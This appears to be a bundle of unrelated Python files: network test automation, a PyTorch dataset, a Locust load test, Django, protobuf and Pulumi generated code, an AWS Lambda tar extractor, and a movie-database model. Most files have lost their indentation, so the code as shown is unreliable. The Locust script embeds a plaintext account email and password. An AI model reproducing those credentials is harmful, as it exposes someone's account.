for device_name in list(testbed.devices.keys()):
if exclude_devices and device_name in exclude_devices:
continue
if include_devices and device_name not in include_devices:
continue
# Find device from testbed yaml file based on device name
device = testbed.devices[device_name]
if include_os and device.os not in include_os:
continue
if exclude_os and device.os in exclude_os:
continue
if not device.is_connected():
log.warning("Skipping '{dev}' as it is not connected"
.format(dev=device_name))
continue
log.info("Executing 'configure_replace' subsection on '{dev}'"
.format(dev=device_name))
_configure_replace_util(device=device, dev=dev, device_name=device_name)
else:
log.info("Executing 'configure_replace' subsection on '{dev}'"
.format(dev=name))
if name not in testbed.devices:
log.warning("Skipping '{dev}' as it does not exist in the testbed"
.format(dev=name))
continue
device = testbed.devices[name]
if not device.is_connected():
log.warning("Skipping '{dev}' as it is not connected"
.format(dev=name))
continue
_configure_replace_util(device=device, dev=dev, device_name=name)
@aetest.subsection
def learn_system_defaults(self, testbed):
"""Execute commands to learn default system information
Args:
testbed (`obj`): Testbed object
Returns:
None
Raises:
pyATS Results
"""
# Get default memory location
self.parent.default_file_system = {}
# Create Summary
summary = Summary(title='Summary', width=150)
for device in self.parent.mapping_data['devices']:
dev = testbed.devices[device]
lookup = Lookup.from_device(dev)
# Skip in case of TGN device
if dev.type in EXCLUDED_DEVICE_TYPES:
log.info("This subsection is not supported for "
"TGN device '{}'".format(dev.name))
msg = " - This subsection is not supported for 'TGN' devices"
summarize(summary, message=msg, device=dev.name)
continue
try:
self.parent.default_file_system[dev.name] = lookup.sdk.libs.\
abstracted_libs.subsection.get_default_dir(
device=dev)
msg = " - Successfully learnt system default directory"
summarize(summary, message=msg, device=device)
        except LookupError:
            log.info("Could not find a corresponding 'get_default_dir' "
                     "implementation for device {d}".format(d=dev.name))
            msg = " - Didn't find a 'get_default_dir' implementation "\
                "for the device OS; please contact Genie support"
            summarize(summary, message=msg, device=device)
except Exception as e:
msg = " - Failed to learn system default directory"
summarize(summary, message=msg, device=device)
summary.print()
self.failed('Unable to learn system default directory',
from_exception=e)
summary.print()
if not self.parent.default_file_system:
# Create Summary
summary = Summary(title='Summary', width=90)
summary.add_message(
"* Summary for device(s): "
"{}".format(
', '.join(
self.parent.mapping_data['devices'])))
summary.add_sep_line()
msg = " - Couldn't set system default directory"
summarize(summary, message=msg)
summary.print()
self.failed('Unable to set system default directory')
# TODO: Learn and save more system defaults in this section
def summarize(summary, message, device=None):
'''A function for building the summary table messages'''
if device:
summary.add_message('* Summary for device: {}'.
format(device))
summary.add_sep_line()
summary.add_message(message)
summary.add_subtitle_line()
def asynchronous_save_boot_variable(self, device, device_dict):
'''Use asynchronous execution when saving boot variables on devices'''
    log.info(banner("Check boot information to see if it is consistent\n"
                    "and save bootvar to startup-config on device '{d}'".
                    format(d=device.name)))
# get platform pts
platform_pts = self.parameters.get('pts', {}).get('platform', {}).get(
device.name, None)
try:
result = Lookup.from_device(device).sdk.libs.abstracted_libs.subsection.\
save_device_information(device=device, platform_pts=platform_pts)
except Exception as e:
device_dict[device.name] = 'Failed'
else:
if result == 'Skipped':
device_dict[device.name] = 'Skipped'
else:
device_dict[device.name] = 'Passed'
return device_dict
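# --- Usage sketch (not part of the original module) ---
# A hypothetical illustration of how `summarize` composes a Summary table;
# the device name and message below are placeholders.
#
#     summary = Summary(title='Summary', width=90)
#     summarize(summary, message=' - Successfully saved boot variable',
#               device='uut')
#     summary.print()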
|
import os
import numpy as np
import h5py
import pickle
from tqdm import tqdm
import torch
from torch.utils.data import Dataset
from torch.utils.data import DataLoader
from utils import generate_candidates, calculate_IoU_batch
class RawData(Dataset):
def __init__(self, feature_path, data_path):
self.feature_path = feature_path
with open(data_path, 'rb') as f:
self.data = pickle.load(f)
features = h5py.File(self.feature_path, 'r')
        video_names = [x for x in self.data.keys() if x in features]
# [(video1, sentence_num1), (video2, sentence_num1)...]
self.data_idx = []
for video in video_names:
sentence_num = len(self.data[video]['sentences'])
for i in range(sentence_num):
self.data_idx.append((video, i))
def __getitem__(self, index):
video_name, sentence_idx = self.data_idx[index]
item = self.data[video_name]
duration = item['duration']
timestamps = item['timestamps'][sentence_idx]
sentences = item['sentences'][sentence_idx]
tokens = item['tokens'][sentence_idx]
embeddings = item['embeddings'][sentence_idx]
word_mat = item['adj_mats'][sentence_idx]
        with h5py.File(self.feature_path, 'r') as features:
            vfeats = features[video_name][:]
frame_num = vfeats.shape[0]
start_frame = int(1.0 * frame_num * timestamps[0] / duration)
end_frame = int(1.0 * frame_num * timestamps[1] / duration)
if end_frame >= frame_num:
end_frame = frame_num - 1
if start_frame > end_frame:
start_frame = end_frame
assert start_frame <= end_frame
assert 0 <= start_frame < frame_num
assert 0 <= end_frame < frame_num
label = np.asarray([start_frame, end_frame]).astype(np.int32)
srl = item['srl'][sentence_idx]
return vfeats, embeddings, word_mat, label, duration, timestamps, srl
def __len__(self):
return len(self.data_idx)
class VideoSentencePair(RawData):
def __init__(self, feature_path, data_path, max_frames_num, max_words_num, window_widths, max_srl_num):
super().__init__(feature_path, data_path)
self.max_frames_num = max_frames_num
self.max_words_num = max_words_num
self.candidates, _ = generate_candidates(max_frames_num, window_widths) #generate candidates of windows
self.max_srl_num = max_srl_num
def __getitem__(self, index):
vfeats, word_vecs, word_mat, label, duration, timestamps, srl = super().__getitem__(index)
vfeats, frame_mask, frame_mat, label = self.__video_sampling(vfeats, label)
word_vecs, word_mask, word_mat, objects, actions, srl_num = self.__word_padding(word_vecs, word_mat, srl)
scores = self.__cal_candidate_scores(label, frame_mask, duration) #IOU of each window
return vfeats, frame_mask, frame_mat, word_vecs, word_mask, word_mat, label, scores, duration, timestamps, objects, actions, srl_num
def __video_sampling(self, vfeats, label):
# sample frame to a fixed num and recompute the label
ori_video_len = vfeats.shape[0]
frame_mask = np.ones([self.max_frames_num], np.uint8)
index = np.linspace(start=0, stop=ori_video_len - 1, num=self.max_frames_num).astype(np.int32)
new_video = []
for i in range(len(index) - 1):
start = index[i]
end = index[i + 1]
if start == end or start + 1 == end:
new_video.append(vfeats[start])
else:
new_video.append(np.mean(vfeats[start: end], 0))
new_video.append(vfeats[-1])
vfeats = np.stack(new_video, 0)
v_sqrt = np.sqrt((vfeats * vfeats).sum(-1))[:, np.newaxis]
frame_mat = vfeats.dot(vfeats.T) / v_sqrt.dot(v_sqrt.T)
frame_mat = np.zeros_like(frame_mat) + np.triu(frame_mat, 2) + np.tril(frame_mat, -2)
frame_mat[frame_mat == 0] = 1
frame_mat[frame_mat < 0.7] = 0
label[0] = min(np.where(index >= label[0])[0])
if label[1] == ori_video_len - 1:
label[1] = self.max_frames_num - 1
else:
label[1] = max(np.where(index <= label[1])[0])
if label[1] < label[0]:
label[0] = label[1]
return vfeats, frame_mask, frame_mat, label
def __word_padding(self, word_vecs, word_mat, srl):
# padding words to a fixed num and adjust the word_mat
objects = []
actions = []
objects_list = []
actions_list = ['B-V','I-V']
srl_num = 0
if srl: #non-empty
srl_num = len(srl)
for srl_sent in srl:
dig_objects = []
dig_actions = []
for srl_word in srl_sent:
if srl_word == 'O':
dig_objects.append(0)
dig_actions.append(0)
elif srl_word in actions_list:
dig_objects.append(0)
dig_actions.append(1)
else:
dig_objects.append(1)
dig_actions.append(0)
objects.append(dig_objects)
actions.append(dig_actions)
objects = np.array(objects, np.uint8)
actions = np.array(actions, np.uint8)
ori_srl_num = len(srl)
ori_srl_sent_num = len(srl[0])
if ori_srl_num < self.max_srl_num:
if ori_srl_sent_num < self.max_words_num:
objects = np.pad(objects, ((0, self.max_srl_num - ori_srl_num), (0, self.max_words_num - ori_srl_sent_num)), mode='constant')
actions = np.pad(actions, ((0, self.max_srl_num - ori_srl_num), (0, self.max_words_num - ori_srl_sent_num)), mode='constant')
else:
objects = objects[:, :self.max_words_num]
objects = np.pad(objects, ((0, self.max_srl_num - ori_srl_num), (0, 0)), mode='constant')
actions = actions[:, :self.max_words_num]
actions = np.pad(actions, ((0, self.max_srl_num - ori_srl_num), (0, 0)), mode='constant')
else:
objects = objects[:self.max_srl_num]
actions = actions[:self.max_srl_num]
if ori_srl_sent_num < self.max_words_num:
objects = np.pad(objects, ((0, 0), (0, self.max_words_num - ori_srl_sent_num)), mode='constant')
actions = np.pad(actions, ((0, 0), (0, self.max_words_num - ori_srl_sent_num)), mode='constant')
else:
objects = objects[:, :self.max_words_num]
actions = actions[:, :self.max_words_num]
else:
objects = np.zeros((self.max_srl_num, self.max_words_num), np.uint8)
actions = np.zeros((self.max_srl_num, self.max_words_num), np.uint8)
ori_words_num = word_vecs.shape[0]
if ori_words_num < self.max_words_num:
word_mask = np.zeros([self.max_words_num], np.uint8)
word_mask[range(ori_words_num)] = 1
word_vecs = np.pad(word_vecs, ((0, self.max_words_num - ori_words_num), (0, 0)), mode='constant')
word_mat = np.pad(word_mat,
((0, self.max_words_num - word_mat.shape[0]),
(0, self.max_words_num - word_mat.shape[1])),
mode='constant')
else:
word_mask = np.ones([self.max_words_num], np.uint8)
word_vecs = word_vecs[:self.max_words_num]
word_mat = word_mat[:self.max_words_num, :self.max_words_num]
        word_mat = (word_mat != 0).astype(float)
word_mat = word_mat + word_mat.T - np.ones(word_mat.shape[0])
return word_vecs, word_mask, word_mat, objects, actions, srl_num
def __cal_candidate_scores(self, label, frame_mask, duration):
seq_len = np.sum(frame_mask, -1)
labels = np.repeat(np.expand_dims(label, 0), self.candidates.shape[0], 0) # candidate_num x 2
IoUs = calculate_IoU_batch(
(self.candidates[:, 0] * duration / seq_len, (self.candidates[:, 1] + 1) * duration / seq_len),
(labels[:, 0] * duration / seq_len, (labels[:, 1] + 1) * duration / seq_len)
)
max_IoU = np.max(IoUs)
if max_IoU == 0.0:
print(label)
exit(1)
IoUs[IoUs < 0.3 * max_IoU] = 0.0
IoUs = IoUs / max_IoU
scores = IoUs.astype(np.float32)
return scores
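# --- Usage sketch (not part of the original module) ---
# Hypothetical wiring of the dataset into a DataLoader; the paths, size limits
# and window widths below are placeholders, not values from the source.
#
#     dataset = VideoSentencePair('features.h5', 'data.pkl',
#                                 max_frames_num=128, max_words_num=20,
#                                 window_widths=(8, 16, 32), max_srl_num=4)
#     loader = DataLoader(dataset, batch_size=16, shuffle=True)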
|
import time
from locust import HttpUser, task, between
class QuickstartUser(HttpUser):
wait_time = between(1, 2.5)
host = "https://konec-mvno-web-cpjfbnt2q-oppo-dev.vercel.app/" #定义主机
@task(1)
def my_1_task(self):
self.client.get("/support") #请求support页面
@task(2)
def my_2_task(self):
self.client.get("/plans") #请求But a plant页面
@task(3)
def my_3_task(self):
self.client.get("/coverage") #请求coverage页面
@task(4)
def my_4_task(self):
self.client.get("/about") #请求Why us页面
@task(5)
def login(self):
self.client.post(
"/api/auth/login", {"username": "konecau002@gmail.com", "password": "Sps@123456"})
@task(6)
def my_6_task(self):
self.client.get("/_next/data/5sSK9Ibf6E-Zf9cIdOh68/activation.json")
if __name__ == '__main__':
import os
os.system('locust -f aaa.py')
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.18 on 2019-03-09 02:19
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('braintreepayment', '0002_payment_refactor'),
]
operations = [
migrations.AlterField(
model_name='braintreetransaction',
name='amount',
field=models.DecimalField(decimal_places=2, max_digits=20),
),
]
|
# Copyright 2020 Thomas Rogers
# SPDX-License-Identifier: Apache-2.0
from .. import map_objects
class SpriteFacing:
def __init__(self, sprite: map_objects.EditorSprite):
self._sprite = sprite
def change_facing(self):
self._sprite.invalidate_geometry()
stat = self._sprite.sprite.sprite.stat
stat.facing = (stat.facing + 1) % 3
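# --- Usage sketch (not part of the original module) ---
# `change_facing` cycles stat.facing through 0 -> 1 -> 2 -> 0; a hypothetical
# editor action would call it once per key press:
#
#     facing = SpriteFacing(selected_sprite)  # selected_sprite is assumed
#     facing.change_facing()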
|
# By Chris Bailey-Kellogg for "Balancing sensitivity and specificity in
# distinguishing TCR groups by CDR sequence similarity"
# See README for license information
import csv, sys
import matplotlib as mpl
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
# args:
# 1: cdr id -- a3 or b3
# [2]: stcr_results directory (defaults to results/stcr_results/)
cdr_id = sys.argv[1]
if len(sys.argv)>2:
results_dir = sys.argv[2]
if results_dir[-1] != '/': results_dir += '/'
else:
results_dir = 'results/stcr_results/'
# (cdr, nbr) -> distance, for both sequence and structural distances
seq_dists = {}
struct_dists = {}
# seq -> nearest seq nbr in same or other cluster
same = {}
other = {}
for row in csv.DictReader(open(results_dir+cdr_id+'_stcr_pairs.csv')):
seq_dists[row['cdr'],row['nbr']] = float(row['seq dist'])
if row['cluster'] == row['nbr cluster']: same[row['cdr']] = row['nbr']
else: other[row['cdr']] = row['nbr']
for row in csv.DictReader(open(results_dir+cdr_id+'_pair_rmsds.csv')):
struct_dists[row['cdr'],row['nbr']] = float(row['rmsd'])
assert(set(same.keys()) == set(other.keys()))
# save out compiled distances
with open(results_dir+cdr_id+'_seq_vs_struct.csv','w') as outfile:
csvout = csv.writer(outfile)
csvout.writerow(['cdr','correct','snbr','snbr seq','snbr struct','onbr','onbr seq','onbr struct','delta seq','delta struct'])
for cdr in same:
snbr = same[cdr]; onbr = other[cdr]
csvout.writerow([cdr, 1 if seq_dists[cdr,snbr]<=seq_dists[cdr,onbr] else 0,
snbr, seq_dists[cdr,snbr], struct_dists.get((cdr,snbr),''),
onbr, seq_dists[cdr,onbr], struct_dists.get((cdr,onbr),''),
seq_dists[cdr,snbr] - seq_dists[cdr,onbr],
struct_dists[cdr,snbr] - struct_dists[cdr,onbr] if ((cdr,snbr) in struct_dists and (cdr,onbr) in struct_dists) else ''])
# for each cdr, plot delta seq (same vs. other nbr) vs. delta struct
# different color for correct vs. incorrect classifications, though that's redundant since quadrant makes that clear
cmap = plt.cm.get_cmap('gnuplot2') # see https://matplotlib.org/examples/color/colormaps_reference.html
fig = plt.figure()
plt.axvline(x=0, color='gray', linestyle='--')
plt.axhline(y=0, color='gray', linestyle='--')
for cdr in same:
snbr = same[cdr]; onbr = other[cdr]
if (cdr,snbr) not in struct_dists:
        print('no struct_dist for', cdr, snbr)
continue
if (cdr,onbr) not in struct_dists:
        print('no struct_dist for', cdr, onbr)
continue
seq_delta = seq_dists[cdr,snbr]-seq_dists[cdr,onbr]
struct_delta = struct_dists[cdr,snbr]-struct_dists[cdr,onbr]
plt.plot(seq_delta, struct_delta, '.', markersize=12, color=cmap(seq_dists[cdr,snbr]))
plt.xticks(fontsize=15)
plt.yticks(fontsize=15)
plt.xlabel(r'$\Delta$ seq', fontsize=18)
plt.ylabel(r'$\Delta$ struct', fontsize=18)
divider = make_axes_locatable(plt.gca())
cax = divider.new_horizontal(size="5%", pad=0.2, pack_start=False) # thanks to https://stackoverflow.com/questions/13310594/positioning-the-colorbar
fig.add_axes(cax)
cb = mpl.colorbar.ColorbarBase(cax, cmap=cmap, orientation='vertical')
cb.set_label('seq dist', fontsize=15)
plt.tight_layout()
plt.savefig(results_dir+cdr_id+'_seq_vs_struct.pdf')
|
import os
from django.conf import settings
from django.core.management import call_command
from django.db import connection
def spatialite_init_file():
# SPATIALITE_SQL may be placed in settings to tell
# GeoDjango to use a specific user-supplied file.
return getattr(settings, 'SPATIALITE_SQL', 'init_spatialite-2.3.sql')
def create_test_spatial_db(verbosity=1, autoclobber=False, interactive=False):
"Creates a spatial database based on the settings."
    # Making sure we're using the SQLite backend.
if settings.DATABASE_ENGINE != 'sqlite3':
raise Exception('SpatiaLite database creation only supported on sqlite3 platform.')
# Getting the test database name using the SQLite backend's
# `_create_test_db`. Unless `TEST_DATABASE_NAME` is defined,
# it returns ":memory:".
db_name = connection.creation._create_test_db(verbosity, autoclobber)
    # Closing out the current connection to the database originally set
    # in the settings. This makes it so the `load_spatialite_sql`
    # function will be run on the connection for the _test_ database instead.
connection.close()
# Point to the new database
settings.DATABASE_NAME = db_name
connection.settings_dict["DATABASE_NAME"] = db_name
can_rollback = connection.creation._rollback_works()
settings.DATABASE_SUPPORTS_TRANSACTIONS = can_rollback
connection.settings_dict["DATABASE_SUPPORTS_TRANSACTIONS"] = can_rollback
# Finally, loading up the SpatiaLite SQL file.
load_spatialite_sql(db_name, verbosity=verbosity)
    if verbosity >= 1:
        print('Creation of spatial database %s successful.' % db_name)
# Syncing the database
call_command('syncdb', verbosity=verbosity, interactive=interactive)
def load_spatialite_sql(db_name, verbosity=1):
"""
This routine loads up the SpatiaLite SQL file.
"""
# Getting the location of the SpatiaLite SQL file, and confirming
# it exists.
spatialite_sql = spatialite_init_file()
if not os.path.isfile(spatialite_sql):
raise Exception('Could not find the SpatiaLite initialization SQL file: %s' % spatialite_sql)
# Opening up the SpatiaLite SQL initialization file and executing
# as a script.
sql_fh = open(spatialite_sql, 'r')
try:
cur = connection.cursor()
cur.executescript(sql_fh.read())
finally:
sql_fh.close()
|
def swap_with_head(self, head, n):
    """Swap the value of the head node with the value of the n-th node (1-based)."""
    head_val = head.val
    current = head
    count = 0
    while current:
        count += 1
        if count == n:
            head.val = current.val
            current.val = head_val
            break
        current = current.next
    return head
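# --- Usage sketch (not part of the original snippet) ---
# `swap_with_head` is written as a method on a singly linked list class;
# ListNode below is an assumed minimal node type, not from the source.
class ListNode:
    def __init__(self, val, next=None):
        self.val = val
        self.next = next

if __name__ == '__main__':
    head = ListNode(1, ListNode(2, ListNode(3)))
    swap_with_head(None, head, 3)  # `self` is unused, so None is passed here
    print(head.val)  # 3, after swapping the head with the 3rd node's value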
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
from google.protobuf import descriptor
from google.protobuf import message
from google.protobuf import reflection
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
DESCRIPTOR = descriptor.FileDescriptor(
name='repeated_packed.proto',
package='',
serialized_pb='\n\x15repeated_packed.proto\"\x1a\n\x05Thing\x12\x11\n\x05parts\x18\x04 \x03(\x05\x42\x02\x10\x01')
_THING = descriptor.Descriptor(
name='Thing',
full_name='Thing',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(
name='parts', full_name='Thing.parts', index=0,
number=4, type=5, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=descriptor._ParseOptions(descriptor_pb2.FieldOptions(), '\020\001')),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=25,
serialized_end=51,
)
DESCRIPTOR.message_types_by_name['Thing'] = _THING
class Thing(message.Message):
__metaclass__ = reflection.GeneratedProtocolMessageType
DESCRIPTOR = _THING
# @@protoc_insertion_point(class_scope:Thing)
# @@protoc_insertion_point(module_scope)
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._enums import *
__all__ = [
'GetTaskDefinitionResult',
'AwaitableGetTaskDefinitionResult',
'get_task_definition',
'get_task_definition_output',
]
@pulumi.output_type
class GetTaskDefinitionResult:
def __init__(__self__, arn=None, auto_create_tasks=None, id=None, lo_ra_wan_update_gateway_task_entry=None, name=None, tags=None, task_definition_type=None, update=None):
if arn and not isinstance(arn, str):
raise TypeError("Expected argument 'arn' to be a str")
pulumi.set(__self__, "arn", arn)
if auto_create_tasks and not isinstance(auto_create_tasks, bool):
raise TypeError("Expected argument 'auto_create_tasks' to be a bool")
pulumi.set(__self__, "auto_create_tasks", auto_create_tasks)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if lo_ra_wan_update_gateway_task_entry and not isinstance(lo_ra_wan_update_gateway_task_entry, dict):
raise TypeError("Expected argument 'lo_ra_wan_update_gateway_task_entry' to be a dict")
pulumi.set(__self__, "lo_ra_wan_update_gateway_task_entry", lo_ra_wan_update_gateway_task_entry)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if tags and not isinstance(tags, list):
raise TypeError("Expected argument 'tags' to be a list")
pulumi.set(__self__, "tags", tags)
if task_definition_type and not isinstance(task_definition_type, str):
raise TypeError("Expected argument 'task_definition_type' to be a str")
pulumi.set(__self__, "task_definition_type", task_definition_type)
if update and not isinstance(update, dict):
raise TypeError("Expected argument 'update' to be a dict")
pulumi.set(__self__, "update", update)
@property
@pulumi.getter
def arn(self) -> Optional[str]:
"""
TaskDefinition arn. Returned after successful create.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="autoCreateTasks")
def auto_create_tasks(self) -> Optional[bool]:
"""
        Whether to automatically create tasks using this task definition for all gateways with the specified current version. If false, the task must be created by calling CreateWirelessGatewayTask.
"""
return pulumi.get(self, "auto_create_tasks")
@property
@pulumi.getter
def id(self) -> Optional[str]:
"""
The ID of the new wireless gateway task definition
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="loRaWANUpdateGatewayTaskEntry")
def lo_ra_wan_update_gateway_task_entry(self) -> Optional['outputs.TaskDefinitionLoRaWANUpdateGatewayTaskEntry']:
"""
The list of task definitions.
"""
return pulumi.get(self, "lo_ra_wan_update_gateway_task_entry")
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
The name of the new resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def tags(self) -> Optional[Sequence['outputs.TaskDefinitionTag']]:
"""
A list of key-value pairs that contain metadata for the destination.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="taskDefinitionType")
def task_definition_type(self) -> Optional['TaskDefinitionType']:
"""
A filter to list only the wireless gateway task definitions that use this task definition type
"""
return pulumi.get(self, "task_definition_type")
@property
@pulumi.getter
def update(self) -> Optional['outputs.TaskDefinitionUpdateWirelessGatewayTaskCreate']:
"""
Information about the gateways to update.
"""
return pulumi.get(self, "update")
class AwaitableGetTaskDefinitionResult(GetTaskDefinitionResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetTaskDefinitionResult(
arn=self.arn,
auto_create_tasks=self.auto_create_tasks,
id=self.id,
lo_ra_wan_update_gateway_task_entry=self.lo_ra_wan_update_gateway_task_entry,
name=self.name,
tags=self.tags,
task_definition_type=self.task_definition_type,
update=self.update)
def get_task_definition(id: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetTaskDefinitionResult:
"""
Creates a gateway task definition.
:param str id: The ID of the new wireless gateway task definition
"""
__args__ = dict()
__args__['id'] = id
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('aws-native:iotwireless:getTaskDefinition', __args__, opts=opts, typ=GetTaskDefinitionResult).value
return AwaitableGetTaskDefinitionResult(
arn=__ret__.arn,
auto_create_tasks=__ret__.auto_create_tasks,
id=__ret__.id,
lo_ra_wan_update_gateway_task_entry=__ret__.lo_ra_wan_update_gateway_task_entry,
name=__ret__.name,
tags=__ret__.tags,
task_definition_type=__ret__.task_definition_type,
update=__ret__.update)
@_utilities.lift_output_func(get_task_definition)
def get_task_definition_output(id: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetTaskDefinitionResult]:
"""
Creates a gateway task definition.
:param str id: The ID of the new wireless gateway task definition
"""
...
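# --- Usage sketch (not part of the generated file) ---
# A hypothetical call inside a Pulumi program; 'example-task-id' is a
# placeholder for a real wireless gateway task definition ID.
#
#     result = get_task_definition(id='example-task-id')
#     pulumi.export('taskDefinitionArn', result.arn)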
|
import json
import boto3
import botocore
import tarfile
from io import BytesIO
s3_client = boto3.client('s3')
def lambda_handler(event, context):
inputbucket = "yourinputbucket"
destbucket = "yourdestbucket"
key = event['Records'][0]['s3']['object']['key']
    # gets tar file from s3
    input_tar_file = s3_client.get_object(Bucket=inputbucket, Key=key)
    input_tar_content = input_tar_file['Body'].read()
    # open file in memory to avoid storage constraints
    with tarfile.open(fileobj=BytesIO(input_tar_content)) as tar:
        for tar_resource in tar:
            if tar_resource.isfile():
                # extract and reupload to s3
                inner_file_bytes = tar.extractfile(tar_resource).read()
                s3_client.upload_fileobj(BytesIO(inner_file_bytes), Bucket=destbucket, Key=tar_resource.name)
return {
'statusCode': 200,
'body': json.dumps('Hello from Lambda!')
}
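# --- Usage sketch (not part of the original handler) ---
# A minimal, hypothetical S3 put event for exercising the handler locally;
# only the object key is read from the event, the bucket names are the
# hard-coded values above.
#
#     event = {'Records': [{'s3': {'object': {'key': 'archive.tar'}}}]}
#     lambda_handler(event, None)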
|
from pomozne_funkcije import Seznam
import baza
import sqlite3
from geslo import sifriraj_geslo, preveri_geslo
conn = sqlite3.connect('filmi.db')
baza.ustvari_bazo_ce_ne_obstaja(conn)
conn.execute('PRAGMA foreign_keys = ON')
uporabnik, zanr, oznaka, film, oseba, vloga, pripada = baza.pripravi_tabele(conn)
class LoginError(Exception):
"""
    Error raised on an incorrect username or password.
"""
pass
class Uporabnik:
"""
    A class representing a user.
"""
insert = uporabnik.dodajanje(["ime", "zgostitev", "sol"])
def __init__(self, ime, id=None):
"""
        User constructor.
"""
self.id = id
self.ime = ime
def __str__(self):
"""
        String representation of the user.
        Returns the username.
"""
return self.ime
@staticmethod
def prijava(ime, geslo):
"""
        Checks whether the username and password are correct.
"""
sql = """
SELECT id, zgostitev, sol FROM uporabnik
WHERE ime = ?
"""
try:
id, zgostitev, sol = conn.execute(sql, [ime]).fetchone()
if preveri_geslo(geslo, zgostitev, sol):
return Uporabnik(ime, id)
except TypeError:
pass
raise LoginError(ime)
def dodaj_v_bazo(self, geslo):
"""
        Adds a user with the given password to the database.
"""
assert self.id is None
zgostitev, sol = sifriraj_geslo(geslo)
with conn:
self.id = uporabnik.dodaj_vrstico(
[self.ime, zgostitev, sol],
self.insert
)
class Film:
"""
    A class representing a movie.
"""
insert = film.dodajanje(["naslov", "leto", "ocena"])
insert_vloga = vloga.dodajanje(["film", "oseba", "tip"])
def __init__(self, id, naslov, leto, ocena):
"""
        Movie constructor.
"""
self.id = id
self.naslov = naslov
self.leto = leto
self.ocena = ocena
def __str__(self):
"""
        String representation of the movie.
        Returns the movie title.
"""
return self.naslov
@staticmethod
def najboljsi_v_letu(leto):
"""
        Returns the top 10 movies of the given year.
"""
sql = """
SELECT id, naslov, leto, ocena
FROM film
WHERE leto = ? AND glasovi > 100000
ORDER BY ocena DESC
LIMIT 10
"""
for id, naslov, leto, ocena in conn.execute(sql, [leto]):
yield Film(id, naslov, leto, ocena)
def dodaj_v_bazo(self, reziserji, igralci):
"""
        Adds a movie with the given directors and actors to the database.
"""
assert self.id is None
with conn:
id = film.dodaj_vrstico(
[self.naslov, self.leto, self.ocena],
self.insert
)
for oseba in reziserji:
vloga.dodaj_vrstico(
[id, oseba.id, TipVloge.R.name],
self.insert_vloga
)
for oseba in igralci:
vloga.dodaj_vrstico(
[id, oseba.id, TipVloge.I.name],
self.insert_vloga
)
self.id = id
class Oseba:
"""
    A class representing a person.
"""
insert = oseba.dodajanje(["ime"])
def __init__(self, ime, id=None):
"""
        Person constructor.
"""
self.id = id
self.ime = ime
def __str__(self):
"""
        String representation of the person.
        Returns the person's name.
"""
return self.ime
def poisci_vloge(self):
"""
        Returns the person's roles.
"""
sql = """
SELECT film.naslov, film.leto, vloga.tip
FROM film
JOIN vloga ON film.id = vloga.film
WHERE vloga.oseba = ?
ORDER BY leto
"""
for naslov, leto, tip_vloge in conn.execute(sql, [self.id]):
yield (naslov, leto, TipVloge[tip_vloge])
@staticmethod
def poisci(niz):
"""
        Returns all persons whose name contains the given string.
"""
sql = "SELECT id, ime FROM oseba WHERE ime LIKE ?"
for id, ime in conn.execute(sql, ['%' + niz + '%']):
yield Oseba(ime=ime, id=id)
def dodaj_v_bazo(self):
"""
        Adds the person to the database.
"""
assert self.id is None
with conn:
self.id = oseba.dodaj_vrstico([self.ime], self.insert)
class TipVloge(Seznam):
"""
    Labels for role types.
"""
I = 'igralec'
R = 'režiser'
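# --- Usage sketch (not part of the original module) ---
# Hypothetical calls against an existing filmi.db; the username, password and
# year below are placeholders.
#
#     user = Uporabnik.prijava('ana', 'geslo123')  # raises LoginError on failure
#     for film in Film.najboljsi_v_letu(1994):
#         print(film)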
|
import os
from pysports import parse_text, _parse_all_table_tags, _parse_all_table_names, _parse_all_column_headers, _parse_all_data
from bs4 import BeautifulSoup
cwd = os.path.dirname(os.path.realpath(__file__))
one_table_full_text = None
one_table_full_text_soup = None
complicated = None
complicated_soup = None
multiple_headers = None
multiple_headers_soup = None
updated_table = None
updated_table_soup = None
def setup():
global one_table_full_text
global one_table_full_text_soup
global complicated
global complicated_soup
global multiple_headers
global multiple_headers_soup
global updated_table
global updated_table_soup
with open(cwd + '/drafts_small.html') as handle:
one_table_full_text = handle.read()
one_table_full_text_soup = BeautifulSoup(one_table_full_text)
with open(cwd + '/superbowl_complicated.html') as handle:
complicated = handle.read()
complicated_soup = BeautifulSoup(complicated)
with open(cwd + '/single_table_multiple_headers.html') as handle:
multiple_headers = handle.read()
multiple_headers_soup = BeautifulSoup(multiple_headers)
with open(cwd + '/2015_draft.html') as handle:
updated_table = handle.read()
updated_table_soup = BeautifulSoup(updated_table)
def test_parse_all_table_tags():
soup = one_table_full_text_soup
tables = _parse_all_table_tags(soup)
assert len(tables) == 1
table = tables[0]
assert len(table.find_all('tr')) == 7
soup = complicated_soup
tables = _parse_all_table_tags(soup)
assert len(tables) == 9
assert len(tables[0].find_all('tr')) == 4
assert len(tables[1].find_all('tr')) == 6
assert len(tables[5].find_all('tr')) == 16
soup = multiple_headers_soup
tables = _parse_all_table_tags(soup)
assert len(tables) == 1
soup = updated_table_soup
